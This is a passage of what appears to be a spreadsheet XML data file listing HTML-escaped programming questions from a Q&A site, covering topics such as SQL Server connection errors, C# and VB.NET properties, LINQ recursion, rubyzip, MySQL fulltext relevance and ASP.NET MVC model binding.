&lt;p&gt;Public Function CreateConnection() As SqlConnection
    _connectionString = ConfigurationManager.ConnectionStrings("ConnectionString").ToString()
    Return New SqlConnection(_connectionString)
End Function&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Here is the error:&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A network-related or instance-specific
  error occurred while establishing a
  connection to SQL Server. The server
  was not found or was not accessible.
  Verify that the instance name is
  correct and that SQL Server is
  configured to allow remote
  connections. (provider: SQL Network
  Interfaces, error: 26 - Error Locating
  Server/Instance Specified)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;How can I resolve this error?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a Turing machine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is a Turing machine and why do people keep mentioning it? My IBM PC is all I need to do my computation! Why does anyone care about these machines?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP Script Version Checking/Notification</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I check the version of my script against an online file to see if it's the latest version?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;For clarification, I'm talking about a script I wrote, not the version of PHP. I'd like to incorporate a way for the end user to tell when I've updated the script.&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Windows Forms native way to flash a form's title bar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a correct way in Windows Forms to flash a titlebar without having to drop to P/Invoking FlashWindow?&lt;/p&gt;
&lt;p&gt;I'm using .NET 2.0 for compatibility and size reasons, so maybe I just missed the method because it's in newer versions of the .NET framework.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can garbage collection coexist with explicit memory management?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example, say one was to include a 'delete' keyword in C# 4. Would it be possible to guarantee that you'd never have wild pointers, but still be able to rely on the garbage collecter, due to the reference-based system?&lt;/p&gt;
&lt;p&gt;The only way I could see it possibly happening is if instead of references to memory locations, a reference would be an index to a table of pointers to actual objects. However, I'm sure that there'd be some condition where that would break, and it'd be possible to break type safety/have dangling pointers.&lt;/p&gt;
&lt;p&gt;EDIT: I'm not talking about just .net. I was just using C# as an example.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any Smalltalk on .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any usable implementations of Smalltalk for the .NET runtime?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using the typical get set properties in C#... with parameters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to do the same in C#. Is there anyway of using properties in C# with parameters in the same way I've done with the parameter 'Key' in this VB.NET example?&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;Private Shared m_Dictionary As IDictionary(Of String, Object) = New Dictionary(Of String, Object)
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;pre&gt;&lt;code&gt;Public Shared Property DictionaryElement(ByVal Key As String) As Object
    Get
        If m_Dictionary.ContainsKey(Key) Then
            Return m_Dictionary(Key)
        Else
            Return [String].Empty
        End If
    End Get
    Set(ByVal value As Object)
        If m_Dictionary.ContainsKey(Key) Then
            m_Dictionary(Key) = value
        Else
            m_Dictionary.Add(Key, value)
        End If
    End Set
End Property
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Printing Scrolled Divs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web page that displays a long line graph inside a div with overflow-x: scroll.
This works well as a web page allowing the use to scroll back and forward through the graph.&lt;/p&gt;
&lt;p&gt;However, when printing the page the scroll position is reset to zero.
Is there a way to overcome this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a zipped file's content using the rubyzip library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to extract an uploaded zip file and store its contents in the database, one entry per file.  The rubyzip library has nearly no useful documentation.&lt;/p&gt;
&lt;p&gt;There is an assets table that has key :string (file name) and data :binary (file contents).&lt;/p&gt;
&lt;p&gt;I'm using the rubyzip library, and have made it as far as this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Zip::ZipFile.open(@file_data.local_path) do |zipfile|
  zipfile.each do |entry|
    next if entry.name =~ /__MACOSX/ or entry.name =~ /\.DS_Store/ or !entry.file?
    asset = self.assets.build
    asset.key = entry.name
    asset.data = ??  # what goes here?
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I set the data from a ZipEntry?  Do I have to use a temp file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Embedding Opera in Cocoa</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I'm writing a Cocoa application that needs to be able to display web content using Opera's rendering engine. This is for a feature, not because I'm an Opera fanboi (I'm not). All I've been able to find on the subject is this &lt;a href="http://www.opera.com/pressreleases/en/2003/09/30/" rel="nofollow"&gt;press release about Adobe's use of the Opera engine&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Has anyone done this? What's the API like? Are they going to want royalties, payments, an NDA, etc?&lt;/p&gt;
&lt;p&gt;Edited to add: This is for a cross-engine web debugging tool. I'm going to be using this alongside WebKit.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there hard evidence of the ROI of unit testing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Unit testing sounds great to me, but I'm not sure I should spend any time really learning it unless I can convince others that is has significant value.  I have to convince the other programmers and, more importantly, the bean-counters in management, that all the extra time spent learning the testing framework, writing tests, keeping them updated, etc.. will pay for itself, and then some.&lt;/p&gt;
&lt;p&gt;What proof is there?  Has anyone actually developed the same software with two separate teams, one using unit testing and the other not, and compared the results?  I doubt it.  Am I just supposed to justify it with, "Look it up on the Internet, everybody's talking about it, so it must be the right thing to do"?&lt;/p&gt;
&lt;p&gt;Where is the hard evidence that will convince the laymen that unit testing is worth the effort?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What methods get called when you resize a JFrame?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a JFrame in which the CENTER portion of the BorderLayout is occupied by a JScrollPane that wraps around a JPanel.  What I'm finding is that when I initiate the action that actually causes the JPanel to be displayed, the display doesn't change.  But when I resize the JFrame, the new JScrollPane has now magically appeared.&lt;/p&gt;
&lt;p&gt;So what methods are called when you resize a JFrame?  If I know, then I can call it in the code and avoid having to resize the frame just to see the results of the operation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>abstract methods in skeletal implementations of interfaces</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was re-reading Effective Java (2nd edition) item 18, &lt;a href="http://my.safaribooksonline.com/9780137150021/ch04lev1sec6" rel="nofollow"&gt;prefer interfaces to abstract classes&lt;/a&gt;.  In that item Josh Bloch provides an example of a skeletal implementation of the &lt;code&gt;Map.Entry&amp;lt;K,V&amp;gt;&lt;/code&gt; interface:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Skeletal Implementation
public abstract class AbstractMapEntry&amp;lt;K,V&amp;gt;
        implements Map.Entry&amp;lt;K,V&amp;gt; {
    // Primitive operations
    public abstract K getKey();
    public abstract V getValue();
 // ... remainder omitted
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Two questions stem from this example:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Why are getKey and getValue explicitly declared here as abstract methods?  They are part of the &lt;a href="http://java.sun.com/j2se/1.5.0/docs/api/java/util/Map.Entry.html" rel="nofollow"&gt;Map.Entry&lt;/a&gt; interface, so I don't see a reason for the redundant declaration in the abstract class.&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Why use the idiom of leaving these primitives methods, as Mr. Bloch refers to them, as abstract?  Why not just do this:&lt;/p&gt;
&lt;p&gt;// Skeletal Implementation
public abstract class AbstractMapEntry
            implements Map.Entry {
        private K key;
        private V value;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    // Primitive operations
    public K getKey() {return key;}
    public V getValue() {return value;}
 // ... remainder omitted
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The benefits of this are that each subclass doesn't have to define its own set of fields, and can still access the key and value by their accessors.  If a subclass truly needs to define its own behavior for the accessors, it can implement the Map.Entry interface directly.  The other downside is that in the equals method provided by the skeletal implementation, the abstract accessors are called:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Implements the general contract of Map.Entry.equals
@Override public boolean equals(Object o) {
    if (o == this)
        return true;
    if (! (o instanceof Map.Entry))
        return false;
    Map.Entry&amp;lt;?,?&amp;gt; arg = (Map.Entry) o;
    return equals(getKey(),   arg.getKey()) &amp;amp;&amp;amp;
           equals(getValue(), arg.getValue());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Bloch warns against calling overridable methods (item 17) from classes designed for inheritance as it leaves the superclass vulnerable to changes made by subclasses.
Maybe this is a matter of opinion, but I was hoping to determine whether there's more to the story, as Bloch doesn't really elaborate on this in the book.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tickmark algorithm for a graph axis</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for an algorithm that places tick marks on an axis, given a range to display, a width to display it in, and a function to measure a string width for a tick mark.&lt;/p&gt;
&lt;p&gt;For example, given that I need to display between 1e-6 and 5e-6 and a width to display in pixels, the algorithm would determine that I should put tickmarks (for example) at 1e-6, 2e-6, 3e-6, 4e-6, and 5e-6.  Given a smaller width, it might decide that the optimal placement is only at the even positions, i.e. 2e-6 and 4e-6 (since putting more tickmarks would cause them to overlap).&lt;/p&gt;
&lt;p&gt;A smart algorithm would give preference to tickmarks at multiples of 10, 5, and 2.  Also, a smart algorithm would be symmetric around zero.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I change the animation style of a modal UIViewController?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently displaying a UIViewController like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[[self navigationController] presentModalViewController:modalViewController animated:YES];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and hiding it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[self.navigationController dismissModalViewControllerAnimated:YES];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The animation is "slide up from the bottom"... then slide back down.  How can I change the animation style?  Can I made it fade in/out?&lt;/p&gt;
&lt;p&gt;Cheers!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to solve Var out of scope within setTimeout call</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to call a setTimeout from within a setInterval callback:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function callback()
{
   //assign myVar
   var myVar = document.getElementById("givenID");
   //...
   //now wait 2 secs then call some code that uses myVAr
   setTimeout("myVar.innerHTML = 'TEST'", 2000);
}
setInterval("callback();", 10000);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;setInterval works as expected but setTimeout call is failing. I guess the problem is related to the fact that I am referencing a variable (myVar) that's not in scope.&lt;/p&gt;
&lt;p&gt;What's the best way to solve this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does "std::size_t" make sense in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In some code I've inherited, I see frequent use of &lt;code&gt;size_t&lt;/code&gt; with the &lt;code&gt;std&lt;/code&gt; namespace qualifier.  For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;std::size_t n = sizeof( long );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It compiles and runs fine, of course.  But it seems like bad practice to me (perhaps carried over from C?).&lt;/p&gt;
&lt;p&gt;Isn't it true that &lt;code&gt;size_t&lt;/code&gt; is built into C++ and therefore in the global namespace?  Is a header file include needed to use &lt;code&gt;size_t&lt;/code&gt; in C++?&lt;/p&gt;
&lt;p&gt;Another way to ask this question is, would the following program (with &lt;em&gt;no&lt;/em&gt; includes) be expected to &lt;em&gt;compile&lt;/em&gt; on all C++ compilers?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;size_t foo()
{
    return sizeof( long );
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Redirect to controller (but with a different master) using a catchall wildcard</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem whereby I want to display a view differently (a different master page), depending on where it came from, but don't know where to start...&lt;/p&gt;
&lt;p&gt;I have several routes which catch various different types of urls that contain different structures.&lt;/p&gt;
&lt;p&gt;In the code snippet below, I have a product route, and then I have a partner site route which could also go to a product page, but let's say that this partner is Pepsi, and they want their branding on the master page, rather than our own default styling. Lets say I go to &lt;a href="http://mysite.com/products/cola.htm" rel="nofollow"&gt;products/cola.htm&lt;/a&gt;. This should go to the same url as &lt;a href="http://mysite.com/partners/pepsi/products/cola.htm" rel="nofollow"&gt;partners/pepsi/products/cola.htm&lt;/a&gt;, and the PartnerRedirect would be able to handle the url based on the wildcard, by translating the url wildcard (in this case, "products/cola.htm") into a controller action, and forward the user on, (but simply change the master page in the view).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;routes.MapRoute(
	"Product",
	"products/{product}.htm",
	new { controller = "Product", action = "ShowProduct" }
);
routes.MapRoute(
	"ProductReview",
	"products/{product}/reviews.htm",
	new { controller = "Product", action = "ShowProductReview" }
);
routes.MapRoute(
	"Partner",
	"partners/{partner}/{*wildcard}",
	new { controller = "Partners", action = "PartnerRedirect" }
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible? And if so, how?&lt;/p&gt;
&lt;p&gt;Many thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Full-text search relevance is measured in?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am making a quiz system, and when quizmakers insert questions into the Question Bank, I am to check the DB for duplicate / very highly similar questions.&lt;/p&gt;
&lt;p&gt;Testing MySQL's &lt;a href="http://dev.mysql.com/doc/refman/5.0/en/fulltext-search.html#function_match"&gt;MATCH() ... AGAINST()&lt;/a&gt;, the highest relevance I get is 30+, when I test against a 100% similar string.&lt;/p&gt;
&lt;p&gt;So what exactly is the relevance? To quote the &lt;a href="http://dev.mysql.com/doc/refman/5.0/en/fulltext-natural-language.html"&gt;manual&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Relevance values are non-negative floating-point numbers. Zero relevance means no similarity. Relevance is computed based on the number of words in the row, the number of unique words in that row, the total number of words in the collection, and the number of documents (rows) that contain a particular word. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My problem is how to test the relevance value if a string is a duplicate. If it's 100% duplicate, prevent it from being inserter into Question Bank. But if it is only so similar, prompt the quizmaker to verify, insert or not. So how do I do that? 30+ for 100% identical string is not percentage, so I'm stump.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I do inline assembly on the IPhone?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is it done? What steps do I need to take and what pitfalls and gotchas are there to consider?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using SQL Server 2008 Geography types with nHibernate's CreateSQLQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to issue a SQL update statement with nHibernate (2.0.1GA) like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sqlstring = string.Format("set nocount on;update myusers set geo=geography::Point({0}, {1}, 4326) where userid={2};", mlat, mlong, userid);
_session.CreateSQLQuery(sqlstring).ExecuteUpdate();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However I receive the following error: 'geography@p0' is not a recognized built-in function name.&lt;/p&gt;
&lt;p&gt;I thought CreateSQLQuery would just pass the SQL I gave it and execute it...guess not.  Any ideas on how I can do that within the context of nHibernate?&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Anonymous Types in a signature </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get the signature on the method below to work. As this is an Anonymous Type I have some trouble, any help would be great.&lt;/p&gt;
&lt;p&gt;When I looked at sortedGameList.ToList() in a QuickWatch window I get the signature &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Collections.Generic.List&amp;lt;&amp;lt;&amp;gt;f__AnonymousType0&amp;lt;System.DateTime,System.Linq.IGrouping&amp;lt;System.DateTime,DC.FootballLeague.Web.Models.Game&amp;gt;&amp;gt;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Many Thanks&lt;/p&gt;
&lt;p&gt;Donald&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   public List&amp;lt;IGrouping&amp;lt;DateTime, Game&amp;gt;&amp;gt; getGamesList(int leagueID)
{
    var sortedGameList =
        from g in Games
        group g by g.Date into s
        select new { Date = s.Key, Games = s };
    return sortedGameList.ToList();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to calculate the bounding box for a given lat/lng location?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have given a location defined by latitude and longitude.
Now i want to calculate a bounding box within e.g. 10 kilometers of that point.&lt;/p&gt;
&lt;p&gt;The bounding box should be defined as latmin, lngmin and latmax, lngmax.&lt;/p&gt;
&lt;p&gt;I need this stuff in order to use the &lt;a href="http://www.panoramio.com/api/" rel="nofollow"&gt;panoramio API&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Does someone know the formula of how to get thos points?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Guys i am looking for a formula/function which takes lat &amp;amp; lng as input and returns a bounding box as latmin &amp;amp; lngmin and latmax &amp;amp; latmin.
Mysql, php, c#, javascript is fine but also pseudocode should be okay.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; I am not looking for a solution which shows me the distance of 2 points&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm/pattern for selecting sub-collections using LINQ and C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C# collection of strings. Each string is a sentence that can appear on a page. I also have a collection of page breaks which is a collection of int's. representing the index where the collection of strings are split to a new page.&lt;/p&gt;
&lt;p&gt;Example: Each 10 items in the string collection is a page so the collection of page breaks would be a collection of int's with the values of 10, 20, 30. ...&lt;/p&gt;
&lt;p&gt;So if there are 2 pages of strings then there will be 1 item in the page break collection and if there is 1 page then the page break collection would have zero items.&lt;/p&gt;
&lt;p&gt;I am trying to create the following function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;string&amp;gt; GetPage(List&amp;lt;string&amp;gt; docList, List&amp;lt;int&amp;gt; pageBreakList, int pageNum)
{
    // This function returns a subset of docList - just the page requested
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've taken a few stabs at writing this function and keep on coming up with complex if and switch statements to take into account single and two page documents and page numbers being requested outside the range (e.g. last page should be returned if page number is greater than number of pages and first page if page number is 0 or less).&lt;/p&gt;
&lt;p&gt;My struggle with this problem leads me to ask the question: Is there a well known pattern or algorithm to address this type of subset query?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Updating referenced columns in Postgres</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When there are one of more columns that reference another, I'm struggling for the best way to update that column while maintaining referential integrity. For example, if I have a table of labels and descriptions and two entries:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Label | Description
------------------------------------
read  | This item has been read
READ  | You read this thing already
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, I don't want these duplicates. I want to add a constraint to the column that doesn't allow values that are case-insensitively duplicates, as in the example. However, I have several rows of several other tables referencing 'READ', the one I want to drop.&lt;/p&gt;
&lt;p&gt;I know Postgres knows which fields of other rows are referencing this, because I can't delete it as long as they are there. So, how could I get any field referencing this to update to 'read'? This is just an example, and I actually have a few places I want to do this. Another example is actually an int primary key for a few tables, where I want to add a new table as a sort of 'base table' that the existing ones extend and so they'll all need to have unique IDs now, which means updating the ones they have.&lt;/p&gt;
&lt;p&gt;I am open to recipes for functions I can add to do this, tools I can utilize, or anything else.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I pass multiple objects to ViewPage in ASP.NET MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think I know the answer, but I would like to bounce around some ideas.&lt;/p&gt;
&lt;p&gt;I would like to pass several (in this instance 2) somewhat different pieces of data to a View.  My initial thought is simply to wrap-up the various objects into a containing object and pass them along that way. Then from the View, I'd have something like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var objContainer = ViewData.Model;
var thisObject = objContainer.ThisObject;
var thatObject = objContainer.ThatObject;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and these could be used independently in the Master Page and View Page.&lt;/p&gt;
&lt;p&gt;Is that the "best" way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC Beta 1: DefaultModelBinder wrongly persists parameter and validation state between unrelated requests</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I use the default model binding to bind form parameters to a complex object which is a parameter to an action, the framework remembers the values passed to the first request, meaning that any subsequent request to that action gets the same data as the first. The parameter values and validation state are persisted between unrelated web requests.&lt;/p&gt;
&lt;p&gt;Here is my controller code (&lt;code&gt;service&lt;/code&gt; represents access to the back end of the app):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    [AcceptVerbs(HttpVerbs.Get)]
    public ActionResult Create()
    {
        return View(RunTime.Default);
    }
    [AcceptVerbs(HttpVerbs.Post)]
    public ActionResult Create(RunTime newRunTime)
    {
        if (ModelState.IsValid)
        {
            service.CreateNewRun(newRunTime);
            TempData["Message"] = "New run created";
            return RedirectToAction("index");
        }
        return View(newRunTime);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My .aspx view (strongly typed as &lt;code&gt;ViewPage&amp;lt;RunTime&lt;/code&gt;&gt;) contains directives like: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%= Html.TextBox("newRunTime.Time", ViewData.Model.Time) %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This uses the &lt;code&gt;DefaultModelBinder&lt;/code&gt; class, which is &lt;a href="http://weblogs.asp.net/scottgu/archive/2008/10/16/asp-net-mvc-beta-released.aspx#three" rel="nofollow"&gt;meant to autobind my model's properties&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I hit the page, enter valid data (e.g. time = 1). The app correctly saves the new object with time = 1. I then hit it again, enter different valid data (e.g. time = 2). However the data that gets saved is the original (e.g. time = 1). This also affects validation, so if my original data was invalid, then all data I enter in the future is considered invalid. Restarting IIS or rebuilding my code flushes the persisted state.&lt;/p&gt;
&lt;p&gt;I can fix the problem by writing my own hard-coded model binder, a basic naive example of which is shown below. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    [AcceptVerbs(HttpVerbs.Post)]
    public ActionResult Create([ModelBinder(typeof (RunTimeBinder))] RunTime newRunTime)
    {
        if (ModelState.IsValid)
        {
            service.CreateNewRun(newRunTime);
            TempData["Message"] = "New run created";
            return RedirectToAction("index");
        }
        return View(newRunTime);
    }
internal class RunTimeBinder : DefaultModelBinder
{
    public override ModelBinderResult BindModel(ModelBindingContext bindingContext)
    {
        // Without this line, failed validation state persists between requests
        bindingContext.ModelState.Clear();
        double time = 0;
        try
        {
            time = Convert.ToDouble(bindingContext.HttpContext.Request[bindingContext.ModelName + ".Time"]);
        }
        catch (FormatException)
        {
            bindingContext.ModelState.AddModelError(bindingContext.ModelName + ".Time", bindingContext.HttpContext.Request[bindingContext.ModelName + ".Time"] + "is not a valid number");
        }
        var model = new RunTime(time);
        return new ModelBinderResult(model);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Am I missing something? I don't think it's a browser session problem as I can reproduce the problem if the first data is entered in one browser and the second in another.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>StackOverflowException caused by a linq query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;edit #2:&lt;/strong&gt; Question solved halfways. Look below&lt;/p&gt;
&lt;p&gt;As a follow-up question, does anyone know of a non-intrusive way to solve what i'm trying to do below (namely, linking objects to each other without triggering infinite loops)?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I try to create a asp.net-mvc web application, and get a StackOverFlowException. A controller triggers the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public ActionResult ShowCountry(int id)
    {
        Country country = _gameService.GetCountry(id);
        return View(country);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The GameService handles it like this (WithCountryId is an extension):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public Country GetCountry(int id)
    {
        return _gameRepository.GetCountries().WithCountryId(id).SingleOrDefault();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The GameRepository handles it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public IQueryable&amp;lt;Country&amp;gt; GetCountries()
    {
        var countries =  from c in _db.Countries
               select new Country
               {
                   Id = c.Id,
                   Name = c.Name,
                   ShortDescription = c.ShortDescription,
                   FlagImage = c.FlagImage,
                   Game = GetGames().Where(g =&amp;gt; g.Id == c.GameId).SingleOrDefault(),
                   SubRegion = GetSubRegions().Where(sr =&amp;gt; sr.Id == c.SubRegionId).SingleOrDefault(),
               };
        return countries;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The GetGames() method causes the StackOverflowException:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public IQueryable&amp;lt;Game&amp;gt; GetGames()
    {
        var games = from g in _db.Games                   
               select new Game
               {
                   Id = g.Id,
                   Name = g.Name
               };
        return games;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My Business objects are different from the linq2sql classes, that's why I fill them with a select new.&lt;/p&gt;
&lt;p&gt;An unhandled exception of type 'System.StackOverflowException' occurred in mscorlib.dll&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;edit #1:&lt;/strong&gt; I have found the culprit, it's the following method, it triggers the GetCountries() method which in return triggers the GetSubRegions() again, ad nauseam:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public IQueryable&amp;lt;SubRegion&amp;gt; GetSubRegions()
    {
        return from sr in _db.SubRegions
               select new SubRegion
               {
                   Id = sr.Id,
                   Name = sr.Name,
                   ShortDescription = sr.ShortDescription,
                   Game = GetGames().Where(g =&amp;gt; g.Id == sr.GameId).SingleOrDefault(),
                   Region = GetRegions().Where(r =&amp;gt; r.Id == sr.RegionId).SingleOrDefault(),
                   Countries = new LazyList&amp;lt;Country&amp;gt;(GetCountries().Where(c =&amp;gt; c.SubRegion.Id == sr.Id))
               };
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Might have to think of something else here :) That's what happens when you think in an OO mindset because of too much coffee&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I support wildcards in user-defined search strings in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a simple way to support wildcards ("*") when searching strings - without using RegEx?&lt;/p&gt;
&lt;p&gt;Users are supposed to enter search terms using wildcards, but should not have to deal with the complexity of RegEx:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"foo*"   =&amp;gt;  str.startswith("foo")
"*foo"   =&amp;gt;  str.endswith("foo")
"*foo*"  =&amp;gt;  "foo" in str
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(it gets more complicated when there are multiple search terms though, e.g. "foo*bar*baz")&lt;/p&gt;
&lt;p&gt;This seems like a common issue, so I wonder whether there's a ready-made solution for it.&lt;/p&gt;
&lt;p&gt;Any help would be greatly appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I associate a nib (.xib) file with a UIView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a subclass "s" of UIView.  I want to put some buttons and labels on s.  How do I associate my UIView subclass with a nib file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VB.NET How Do I skin a vb.net app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to skin a vb.net app I made ive googled some stuff and I've seen skinned vb.net apps. &lt;/p&gt;
&lt;p&gt;However it seems like any time i try to find someone explaining it its a link to  a pay for product.&lt;/p&gt;
&lt;p&gt;Does anyone have anything useful on this?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I have seen some free ways to do this programatically I cannot seem to make it translate entirely over to my own unique program.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference of two 'uint'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you attempt to declare an unsigned variable in C#.NET with a value outside its value range it is flagged as a compiler error, but if you produce a negative value at runtime and assign it to that variable at runtime the value wraps.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uint z = -1; // Will not compile
uint a = 5;
uint b = 6;
uint c = a - b; // Will result in uint.MaxValue
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a good reason why unsigned variables wrap in such a situation instead of throwing an exception?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What design pattern to use for User Authentication in Java</t>
  </si>
  <si>
